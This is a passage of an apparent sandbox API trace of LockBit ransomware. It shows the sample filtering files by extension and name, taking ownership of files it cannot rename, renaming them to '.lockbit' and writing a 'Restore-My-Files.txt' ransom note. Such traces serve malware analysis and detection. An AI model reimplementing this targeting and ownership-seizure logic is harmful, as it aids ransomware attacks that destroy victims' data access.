(hObject=0x3c0) returned 1 [0091.227] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat", SecurityInformation=0x1, pSecurityDescriptor=0x344cd88) returned 1 [0091.227] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat", SecurityInformation=0x4, pSecurityDescriptor=0x344cd88) returned 1 [0091.227] free (_Block=0x53fcc0) [0091.227] lstrcmpiW (lpString1=".dat", lpString2=".lockbit") returned -1 [0091.227] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenalm.dat"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenalm.dat.lockbit")) returned 1 [0091.231] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenalm.dat.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0091.231] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0091.231] malloc (_Size=0x40068) returned 0x20abae0 [0091.231] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x20abaf8 | out: lpFileSize=0x20abaf8*=747280) returned 1 [0091.231] ReadFile (in: hFile=0x3c0, lpBuffer=0x20abb14, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 1 [0091.236] GetLastError () returned 0x3e5 [0091.236] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink") returned 1 [0091.236] wsprintfW (in: param_1=0x344cb78, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt") returned 72 [0091.236] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0091.236] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33535c00, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x33535c00, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x332fa78d, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0xc7240, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="hwrenclm.dat", cAlternateFileName="")) returned 1 [0091.236] lstrcmpiW (lpString1=".", lpString2="hwrenclm.dat") returned -1 [0091.236] lstrcmpiW (lpString1="..", lpString2="hwrenclm.dat") returned -1 [0091.237] PathFindExtensionW (pszPath="hwrenclm.dat") returned=".dat" [0091.237] lstrcmpiW (lpString1=".386", lpString2=".dat") returned -1 [0091.237] lstrcmpiW (lpString1=".cmd", lpString2=".dat") returned -1 [0091.237] lstrcmpiW (lpString1=".exe", lpString2=".dat") returned 1 [0091.237] lstrcmpiW (lpString1=".ani", lpString2=".dat") returned -1 [0091.237] lstrcmpiW (lpString1=".adv", lpString2=".dat") returned -1 [0091.237] lstrcmpiW (lpString1=".theme", lpString2=".dat") returned 1 [0091.237] lstrcmpiW (lpString1=".msi", lpString2=".dat") returned 1 [0091.237] lstrcmpiW (lpString1=".msp", lpString2=".dat") returned 1 [0091.237] lstrcmpiW (lpString1=".com", lpString2=".dat") returned -1 [0091.237] lstrcmpiW (lpString1=".diagpkg", lpString2=".dat") returned 1 [0091.237] lstrcmpiW (lpString1=".nls", lpString2=".dat") returned 1 [0091.237] lstrcmpiW (lpString1=".diagcab", lpString2=".dat") returned 1 [0091.237] lstrcmpiW (lpString1=".lock", lpString2=".dat") returned 1 [0091.237] lstrcmpiW (lpString1=".ocx", lpString2=".dat") returned 1 [0091.237] lstrcmpiW (lpString1=".mpa", lpString2=".dat") returned 1 [0091.237] lstrcmpiW (lpString1=".cpl", lpString2=".dat") returned -1 [0091.237] lstrcmpiW (lpString1=".mod", lpString2=".dat") returned 1 [0091.237] lstrcmpiW (lpString1=".hta", lpString2=".dat") returned 1 [0091.237] lstrcmpiW (lpString1=".icns", lpString2=".dat") returned 1 [0091.237] lstrcmpiW (lpString1=".prf", lpString2=".dat") returned 1 [0091.237] lstrcmpiW (lpString1=".rtp", lpString2=".dat") returned 1 [0091.237] lstrcmpiW (lpString1=".diagcfg", lpString2=".dat") returned 1 [0091.237] lstrcmpiW (lpString1=".msstyles", lpString2=".dat") returned 1 [0091.238] lstrcmpiW (lpString1=".bin", lpString2=".dat") returned -1 [0091.238] lstrcmpiW (lpString1=".hlp", lpString2=".dat") returned 1 [0091.238] lstrcmpiW (lpString1=".shs", lpString2=".dat") returned 1 [0091.238] lstrcmpiW (lpString1=".drv", lpString2=".dat") returned 1 [0091.238] lstrcmpiW (lpString1=".wpx", lpString2=".dat") returned 1 [0091.238] lstrcmpiW (lpString1=".bat", lpString2=".dat") returned -1 [0091.238] lstrcmpiW (lpString1=".rom", lpString2=".dat") returned 1 [0091.238] lstrcmpiW (lpString1=".msc", lpString2=".dat") returned 1 [0091.238] lstrcmpiW (lpString1=".spl", lpString2=".dat") returned 1 [0091.238] lstrcmpiW (lpString1=".ps1", lpString2=".dat") returned 1 [0091.238] lstrcmpiW (lpString1=".msu", lpString2=".dat") returned 1 [0091.238] lstrcmpiW (lpString1=".ics", lpString2=".dat") returned 1 [0091.238] lstrcmpiW (lpString1=".key", lpString2=".dat") returned 1 [0091.238] lstrcmpiW (lpString1=".mp3", lpString2=".dat") returned 1 [0091.238] lstrcmpiW (lpString1=".reg", lpString2=".dat") returned 1 [0091.238] lstrcmpiW (lpString1=".dll", lpString2=".dat") returned 1 [0091.238] lstrcmpiW (lpString1=".ini", lpString2=".dat") returned 1 [0091.238] lstrcmpiW (lpString1=".idx", lpString2=".dat") returned 1 [0091.238] lstrcmpiW (lpString1=".sys", lpString2=".dat") returned 1 [0091.238] lstrcmpiW (lpString1=".hlp", lpString2=".dat") returned 1 [0091.238] lstrcmpiW (lpString1=".ico", lpString2=".dat") returned 1 [0091.238] lstrcmpiW (lpString1=".lnk", lpString2=".dat") returned 1 [0091.238] lstrcmpiW (lpString1=".rdp", lpString2=".dat") returned 1 [0091.239] wsprintfW (in: param_1=0x344d620, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0091.239] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="hwrenclm.dat") returned 1 [0091.239] lstrcmpiW (lpString1="ntldr", lpString2="hwrenclm.dat") returned 1 [0091.239] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="hwrenclm.dat") returned 1 [0091.239] lstrcmpiW (lpString1="bootsect.bak", lpString2="hwrenclm.dat") returned -1 [0091.239] lstrcmpiW (lpString1="autorun.inf", lpString2="hwrenclm.dat") returned -1 [0091.239] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\") returned="" [0091.239] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat") returned=".dat" [0091.239] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0091.239] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0091.239] lstrcmpiW (lpString1=".7z", lpString2=".dat") returned -1 [0091.239] lstrcmpiW (lpString1=".ckp", lpString2=".dat") returned -1 [0091.239] lstrcmpiW (lpString1=".dacpac", lpString2=".dat") returned -1 [0091.239] lstrcmpiW (lpString1=".db", lpString2=".dat") returned 1 [0091.239] lstrcmpiW (lpString1=".db-shm", lpString2=".dat") returned 1 [0091.239] lstrcmpiW (lpString1=".db-wal", lpString2=".dat") returned 1 [0091.239] lstrcmpiW (lpString1=".db3", lpString2=".dat") returned 1 [0091.239] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0091.239] lstrcmpiW (lpString1=".dbc", lpString2=".dat") returned 1 [0091.239] lstrcmpiW (lpString1=".dbs", lpString2=".dat") returned 1 [0091.239] lstrcmpiW (lpString1=".dbt", lpString2=".dat") returned 1 [0091.239] lstrcmpiW (lpString1=".dbv", lpString2=".dat") returned 1 [0091.239] lstrcmpiW (lpString1=".frm", lpString2=".dat") returned 1 [0091.240] lstrcmpiW (lpString1=".mdf", lpString2=".dat") returned 1 [0091.240] lstrcmpiW (lpString1=".mrg", lpString2=".dat") returned 1 [0091.240] lstrcmpiW (lpString1=".mwb", lpString2=".dat") returned 1 [0091.240] lstrcmpiW (lpString1=".myd", lpString2=".dat") returned 1 [0091.240] lstrcmpiW (lpString1=".ndf", lpString2=".dat") returned 1 [0091.240] lstrcmpiW (lpString1=".qry", lpString2=".dat") returned 1 [0091.240] lstrcmpiW (lpString1=".sdb", lpString2=".dat") returned 1 [0091.240] lstrcmpiW (lpString1=".sdf", lpString2=".dat") returned 1 [0091.240] lstrcmpiW (lpString1=".sql", lpString2=".dat") returned 1 [0091.240] lstrcmpiW (lpString1=".sqlite", lpString2=".dat") returned 1 [0091.240] lstrcmpiW (lpString1=".sqlite3", lpString2=".dat") returned 1 [0091.240] lstrcmpiW (lpString1=".sqlitedb", lpString2=".dat") returned 1 [0091.240] lstrcmpiW (lpString1=".tmd", lpString2=".dat") returned 1 [0091.240] wsprintfW (in: param_1=0x344cdc0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat.lockbit") returned 72 [0091.240] lstrcmpiW (lpString1=".dat", lpString2=".lockbit") returned -1 [0091.240] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat.lockbit")) returned 0 [0091.240] GetLastError () returned 0x5 [0091.241] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0091.241] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0091.241] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0091.241] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0091.242] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0091.242] NtOpenFile (in: FileHandle=0x344cd68, DesiredAccess=0x80, ObjectAttributes=0x344cc18*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344cc10, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344cd68*=0x3bc, IoStatusBlock=0x344cc10*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0091.243] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0091.243] NtQueryInformationFile (in: FileHandle=0x3bc, IoStatusBlock=0x344cc30, FileInformation=0x344caf0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344cc30, FileInformation=0x344caf0) returned 0x0 [0091.320] NtClose (Handle=0x3bc) returned 0x0 [0091.320] RtlFreeAnsiString (AnsiString="\\") [0091.320] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344cda4 | out: TokenHandle=0x344cda4*=0x3bc) returned 1 [0091.320] malloc (_Size=0x200) returned 0x53fcc0 [0091.321] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344cda0 | out: TokenInformation=0x53fcc0, ReturnLength=0x344cda0) returned 1 [0091.321] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344cd88, dwRevision=0x1 | out: pSecurityDescriptor=0x344cd88) returned 1 [0091.321] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344cd88, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344cd88) returned 1 [0091.321] CloseHandle (hObject=0x3bc) returned 1 [0091.321] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat", SecurityInformation=0x1, pSecurityDescriptor=0x344cd88) returned 1 [0091.321] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat", SecurityInformation=0x4, pSecurityDescriptor=0x344cd88) returned 1 [0091.322] free (_Block=0x53fcc0) [0091.322] lstrcmpiW (lpString1=".dat", lpString2=".lockbit") returned -1 [0091.322] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat.lockbit")) returned 1 [0091.323] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0091.323] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0091.323] malloc (_Size=0x40068) returned 0x206b860 [0091.323] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=815680) returned 1 [0091.323] ReadFile (in: hFile=0x3bc, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 0x0 [0091.470] GetLastError () returned 0x3e5 [0091.470] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink") returned 1 [0091.470] wsprintfW (in: param_1=0x344cb78, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt") returned 72 [0091.470] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0091.471] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32bd661d, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x32bd661d, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x32a7f9d8, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x10ca50, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="hwrlatinlm.dat", cAlternateFileName="")) returned 1 [0091.471] lstrcmpiW (lpString1=".", lpString2="hwrlatinlm.dat") returned -1 [0091.471] lstrcmpiW (lpString1="..", lpString2="hwrlatinlm.dat") returned -1 [0091.471] PathFindExtensionW (pszPath="hwrlatinlm.dat") returned=".dat" [0091.471] lstrcmpiW (lpString1=".386", lpString2=".dat") returned -1 [0091.471] lstrcmpiW (lpString1=".cmd", lpString2=".dat") returned -1 [0091.471] lstrcmpiW (lpString1=".exe", lpString2=".dat") returned 1 [0091.471] lstrcmpiW (lpString1=".ani", lpString2=".dat") returned -1 [0091.471] lstrcmpiW (lpString1=".adv", lpString2=".dat") returned -1 [0091.471] lstrcmpiW (lpString1=".theme", lpString2=".dat") returned 1 [0091.471] lstrcmpiW (lpString1=".msi", lpString2=".dat") returned 1 [0091.471] lstrcmpiW (lpString1=".msp", lpString2=".dat") returned 1 [0091.471] lstrcmpiW (lpString1=".com", lpString2=".dat") returned -1 [0091.471] lstrcmpiW (lpString1=".diagpkg", lpString2=".dat") returned 1 [0091.471] lstrcmpiW (lpString1=".nls", lpString2=".dat") returned 1 [0091.472] lstrcmpiW (lpString1=".diagcab", lpString2=".dat") returned 1 [0091.472] lstrcmpiW (lpString1=".lock", lpString2=".dat") returned 1 [0091.472] lstrcmpiW (lpString1=".ocx", lpString2=".dat") returned 1 [0091.472] lstrcmpiW (lpString1=".mpa", lpString2=".dat") returned 1 [0091.472] lstrcmpiW (lpString1=".cpl", lpString2=".dat") returned -1 [0091.472] lstrcmpiW (lpString1=".mod", lpString2=".dat") returned 1 [0091.472] lstrcmpiW (lpString1=".hta", lpString2=".dat") returned 1 [0091.472] lstrcmpiW (lpString1=".icns", lpString2=".dat") returned 1 [0091.472] lstrcmpiW (lpString1=".prf", lpString2=".dat") returned 1 [0091.472] lstrcmpiW (lpString1=".rtp", lpString2=".dat") returned 1 [0091.472] lstrcmpiW (lpString1=".diagcfg", lpString2=".dat") returned 1 [0091.472] lstrcmpiW (lpString1=".msstyles", lpString2=".dat") returned 1 [0091.472] lstrcmpiW (lpString1=".bin", lpString2=".dat") returned -1 [0091.472] lstrcmpiW (lpString1=".hlp", lpString2=".dat") returned 1 [0091.472] lstrcmpiW (lpString1=".shs", lpString2=".dat") returned 1 [0091.472] lstrcmpiW (lpString1=".drv", lpString2=".dat") returned 1 [0091.472] lstrcmpiW (lpString1=".wpx", lpString2=".dat") returned 1 [0091.472] lstrcmpiW (lpString1=".bat", lpString2=".dat") returned -1 [0091.472] lstrcmpiW (lpString1=".rom", lpString2=".dat") returned 1 [0091.472] lstrcmpiW (lpString1=".msc", lpString2=".dat") returned 1 [0091.472] lstrcmpiW (lpString1=".spl", lpString2=".dat") returned 1 [0091.472] lstrcmpiW (lpString1=".ps1", lpString2=".dat") returned 1 [0091.473] lstrcmpiW (lpString1=".msu", lpString2=".dat") returned 1 [0091.473] lstrcmpiW (lpString1=".ics", lpString2=".dat") returned 1 [0091.473] lstrcmpiW (lpString1=".key", lpString2=".dat") returned 1 [0091.473] lstrcmpiW (lpString1=".mp3", lpString2=".dat") returned 1 [0091.473] lstrcmpiW (lpString1=".reg", lpString2=".dat") returned 1 [0091.473] lstrcmpiW (lpString1=".dll", lpString2=".dat") returned 1 [0091.473] lstrcmpiW (lpString1=".ini", lpString2=".dat") returned 1 [0091.473] lstrcmpiW (lpString1=".idx", lpString2=".dat") returned 1 [0091.473] lstrcmpiW (lpString1=".sys", lpString2=".dat") returned 1 [0091.473] lstrcmpiW (lpString1=".hlp", lpString2=".dat") returned 1 [0091.473] lstrcmpiW (lpString1=".ico", lpString2=".dat") returned 1 [0091.473] lstrcmpiW (lpString1=".lnk", lpString2=".dat") returned 1 [0091.473] lstrcmpiW (lpString1=".rdp", lpString2=".dat") returned 1 [0091.473] wsprintfW (in: param_1=0x344d620, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0091.473] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="hwrlatinlm.dat") returned 1 [0091.473] lstrcmpiW (lpString1="ntldr", lpString2="hwrlatinlm.dat") returned 1 [0091.473] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="hwrlatinlm.dat") returned 1 [0091.473] lstrcmpiW (lpString1="bootsect.bak", lpString2="hwrlatinlm.dat") returned -1 [0091.473] lstrcmpiW (lpString1="autorun.inf", lpString2="hwrlatinlm.dat") returned -1 [0091.473] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\") returned="" [0091.474] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat") returned=".dat" [0091.474] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0091.474] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0091.474] lstrcmpiW (lpString1=".7z", lpString2=".dat") returned -1 [0091.474] lstrcmpiW (lpString1=".ckp", lpString2=".dat") returned -1 [0091.474] lstrcmpiW (lpString1=".dacpac", lpString2=".dat") returned -1 [0091.474] lstrcmpiW (lpString1=".db", lpString2=".dat") returned 1 [0091.474] lstrcmpiW (lpString1=".db-shm", lpString2=".dat") returned 1 [0091.474] lstrcmpiW (lpString1=".db-wal", lpString2=".dat") returned 1 [0091.474] lstrcmpiW (lpString1=".db3", lpString2=".dat") returned 1 [0091.474] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0091.474] lstrcmpiW (lpString1=".dbc", lpString2=".dat") returned 1 [0091.474] lstrcmpiW (lpString1=".dbs", lpString2=".dat") returned 1 [0091.474] lstrcmpiW (lpString1=".dbt", lpString2=".dat") returned 1 [0091.474] lstrcmpiW (lpString1=".dbv", lpString2=".dat") returned 1 [0091.474] lstrcmpiW (lpString1=".frm", lpString2=".dat") returned 1 [0091.474] lstrcmpiW (lpString1=".mdf", lpString2=".dat") returned 1 [0091.474] lstrcmpiW (lpString1=".mrg", lpString2=".dat") returned 1 [0091.474] lstrcmpiW (lpString1=".mwb", lpString2=".dat") returned 1 [0091.474] lstrcmpiW (lpString1=".myd", lpString2=".dat") returned 1 [0091.474] lstrcmpiW (lpString1=".ndf", lpString2=".dat") returned 1 [0091.475] lstrcmpiW (lpString1=".qry", lpString2=".dat") returned 1 [0091.475] lstrcmpiW (lpString1=".sdb", lpString2=".dat") returned 1 [0091.475] lstrcmpiW (lpString1=".sdf", lpString2=".dat") returned 1 [0091.475] lstrcmpiW (lpString1=".sql", lpString2=".dat") returned 1 [0091.475] lstrcmpiW (lpString1=".sqlite", lpString2=".dat") returned 1 [0091.475] lstrcmpiW (lpString1=".sqlite3", lpString2=".dat") returned 1 [0091.475] lstrcmpiW (lpString1=".sqlitedb", lpString2=".dat") returned 1 [0091.475] lstrcmpiW (lpString1=".tmd", lpString2=".dat") returned 1 [0091.475] wsprintfW (in: param_1=0x344cdc0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat.lockbit") returned 74 [0091.475] lstrcmpiW (lpString1=".dat", lpString2=".lockbit") returned -1 [0091.475] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat.lockbit")) returned 0 [0091.475] GetLastError () returned 0x5 [0091.476] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0091.476] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0091.476] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0091.476] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0091.477] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0091.477] NtOpenFile (in: FileHandle=0x344cd68, DesiredAccess=0x80, ObjectAttributes=0x344cc18*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344cc10, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344cd68*=0x3c0, IoStatusBlock=0x344cc10*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0091.478] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0091.479] NtQueryInformationFile (in: FileHandle=0x3c0, IoStatusBlock=0x344cc30, FileInformation=0x344caf0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344cc30, FileInformation=0x344caf0) returned 0x0 [0091.505] NtClose (Handle=0x3c0) returned 0x0 [0091.505] RtlFreeAnsiString (AnsiString="\\") [0091.505] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344cda4 | out: TokenHandle=0x344cda4*=0x3c0) returned 1 [0091.505] malloc (_Size=0x200) returned 0x53fcc0 [0091.505] GetTokenInformation (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344cda0 | out: TokenInformation=0x53fcc0, ReturnLength=0x344cda0) returned 1 [0091.506] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344cd88, dwRevision=0x1 | out: pSecurityDescriptor=0x344cd88) returned 1 [0091.506] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344cd88, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344cd88) returned 1 [0091.506] CloseHandle (hObject=0x3c0) returned 1 [0091.506] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat", SecurityInformation=0x1, pSecurityDescriptor=0x344cd88) returned 1 [0091.506] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat", SecurityInformation=0x4, pSecurityDescriptor=0x344cd88) returned 1 [0091.506] free (_Block=0x53fcc0) [0091.506] lstrcmpiW (lpString1=".dat", lpString2=".lockbit") returned -1 [0091.507] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat.lockbit")) returned 1 [0091.507] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0091.508] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0091.508] malloc (_Size=0x40068) returned 0x20abae0 [0091.508] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x20abaf8 | out: lpFileSize=0x20abaf8*=1100368) returned 1 [0091.508] ReadFile (in: hFile=0x3c0, lpBuffer=0x20abb14, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 1 [0091.580] GetLastError () returned 0x3e5 [0091.580] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft 